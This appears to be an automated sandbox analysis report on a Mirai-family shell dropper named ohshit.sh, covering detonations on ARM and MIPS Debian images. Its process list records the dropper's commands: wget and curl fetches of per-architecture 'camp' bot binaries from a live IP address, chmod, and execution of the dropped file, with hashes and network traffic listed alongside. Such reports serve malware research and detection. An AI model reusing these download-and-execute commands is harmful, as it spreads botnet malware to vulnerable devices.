Analysis Overview
SHA256
951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed
Threat Level: Known bad
The file ohshit.sh was found to be: Known bad.
Malicious Activity Summary
Mirai family
Mirai
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Enumerates running processes
Writes file to system bin folder
UPX packed file
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 08:32
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 08:32
Reported
2024-11-09 08:34
Platform
debian9-armhf-20240611-en
Max time kernel
139s
Max time network
153s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/4/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/20/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/462/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/1/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/149/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/27/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/74/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/647/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/648/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/3/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/401/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/267/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/605/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/302/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/18/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/414/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/74/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/147/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/831/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/28/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/265/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/308/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/95/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/2/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/6/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/305/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/5/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/21/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/exe | /tmp/Chaotic | N/A |
| File opened for reading | /proc/19/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/43/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/776/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/318/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/166/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/305/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/28/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/749/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/13/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/414/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/641/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/10/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/12/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/21/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/605/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/685/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/22/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/107/status | /tmp/Chaotic | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/camp.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sparc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Chaotic | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arc]
/bin/cat
[cat camp.arc]
/bin/chmod
[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86]
/bin/cat
[cat camp.x86]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86_64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86_64]
/bin/cat
[cat camp.x86_64]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.i686]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.i686]
/bin/cat
[cat camp.i686]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips]
/bin/cat
[cat camp.mips]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips64]
/bin/cat
[cat camp.mips64]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mpsl]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mpsl]
/bin/cat
[cat camp.mpsl]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm]
/bin/cat
[cat camp.arm]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm5]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm5]
/bin/cat
[cat camp.arm5]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm6]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm6]
/bin/cat
[cat camp.arm6]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm7]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm7]
/bin/cat
[cat camp.arm7]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.ppc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.ppc]
/bin/cat
[cat camp.ppc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sparc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sparc]
/bin/cat
[cat camp.sparc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.m68k]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.m68k]
/bin/cat
[cat camp.m68k]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sh4]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sh4]
/bin/cat
[cat camp.sh4]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
Network
| Country | Destination | Domain | Proto |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
Files
/tmp/busybox
| MD5 | e588bcf03ae78237b58899d35f50c570 |
| SHA1 | 2194732ebbefbc27bdae876c77f2a97a20175710 |
| SHA256 | 2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88 |
| SHA512 | 904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555 |
/tmp/camp.arc
| MD5 | 36a7a1e959eaf7d6896505777912ecdf |
| SHA1 | 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919 |
| SHA256 | 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca |
| SHA512 | 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0 |
/tmp/Chaotic
| MD5 | dac9f1dcafdb77db0d0ff1be1e704b1e |
| SHA1 | e83605a050e0aaad3dba360545a00036f083eb91 |
| SHA256 | 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d |
| SHA512 | e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571 |
/tmp/Chaotic
| MD5 | 62e0ec59f989335be5fbf630a49da4ea |
| SHA1 | 43bdde1afd1089008539973b08e35dd66fb7451a |
| SHA256 | c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15 |
| SHA512 | ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95 |
/tmp/Chaotic
| MD5 | 4c64afb0ad73da68d0e9dc8894d97f3a |
| SHA1 | 0d3f5938508079bf9dbbe13d75d7b91e21845312 |
| SHA256 | de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b |
| SHA512 | 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107 |
/tmp/Chaotic
| MD5 | adfc93deaed5f946d896d185a7a3672f |
| SHA1 | 30686df1ec33ec8941a6bd5471292ec4dfdc7522 |
| SHA256 | 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd |
| SHA512 | 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f |
/tmp/Chaotic
| MD5 | 69e35fed3302be73c0de271eae2690f7 |
| SHA1 | fdfb172bdcefc5f97d642c56e3771deffa0341c6 |
| SHA256 | 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981 |
| SHA512 | 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2 |
memory/773-1-0x00008000-0x00025990-memory.dmp
memory/816-2-0x00008000-0x0001a904-memory.dmp
memory/821-3-0x00008000-0x0002fc28-memory.dmp
memory/828-4-0x00008000-0x000236c8-memory.dmp
memory/840-5-0xb6763000-0xb6774044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 08:32
Reported
2024-11-09 08:34
Platform
debian9-mipsbe-20240729-en
Max time kernel
145s
Max time network
146s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/4/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/9/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/16/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/327/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/379/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/678/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/2/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/78/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/161/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/356/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/386/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/8/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/74/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/84/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/176/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/715/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/722/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/811/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/23/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/71/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/5/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/3/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/70/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/72/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/77/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/717/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/12/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/37/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/36/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/673/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/707/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/714/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/7/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/10/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/353/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/712/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/819/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/19/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/22/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/122/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/155/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/240/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/73/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/83/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/6/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/14/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/354/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/798/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/75/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/20/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/675/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/81/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/121/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/24/status | /tmp/Chaotic | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
